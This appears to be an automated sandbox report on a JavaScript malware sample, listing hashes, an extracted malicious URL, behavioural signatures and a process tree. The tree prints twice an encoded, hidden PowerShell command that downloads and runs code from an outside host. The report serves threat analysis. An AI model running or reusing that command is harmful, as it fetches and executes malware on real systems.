Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
28/01/2024, 06:41
Static task
static1
Behavioral task
behavioral1
Sample
7c68c35580e9ee9187de78783df4927b.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7c68c35580e9ee9187de78783df4927b.js
Resource
win10v2004-20231215-en
General
-
Target
7c68c35580e9ee9187de78783df4927b.js
-
Size
96KB
-
MD5
7c68c35580e9ee9187de78783df4927b
-
SHA1
a4c42268dc66de6b75bda3caa8bf1e66fd747ff9
-
SHA256
1402aa802d3fb7beb8a680908bcd05d64675a0351c9a388cbdd36beeb2ed793d
-
SHA512
502fe5494292e6d12b5d158a8f2e09c3055707e1056033c8ef71600c8ad36b26e5a7f639b5eda29affc59b3dde0f27917f737a7fdfd08440d5f33621b3c66990
-
SSDEEP
3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXJ:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGs
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2840 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2840 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2724 3028 wscript.exe 28 PID 3028 wrote to memory of 2724 3028 wscript.exe 28 PID 3028 wrote to memory of 2724 3028 wscript.exe 28 PID 2724 wrote to memory of 2840 2724 cmd.exe 30 PID 2724 wrote to memory of 2840 2724 cmd.exe 30 PID 2724 wrote to memory of 2840 2724 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7c68c35580e9ee9187de78783df4927b.js1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-